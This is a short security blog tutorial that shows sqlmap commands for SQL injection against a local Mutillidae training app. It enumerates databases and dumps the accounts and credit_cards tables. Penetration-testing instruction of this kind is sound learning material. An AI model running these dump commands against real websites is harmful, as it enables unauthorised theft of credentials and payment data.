Saturday, April 07, 2012

Dumping Like a Boss - sqlmap 101


SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+------------------------+
| accounts
| blogs_table
| captured_data
| credit_cards
| hitlog
| pen_test_tools
+-------------------------+


Now let's try to dump all the columns for the accounts table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts;

Now's let's try dumping the credit_cards table:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump


Similar query: Select * from credit_cards;

Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.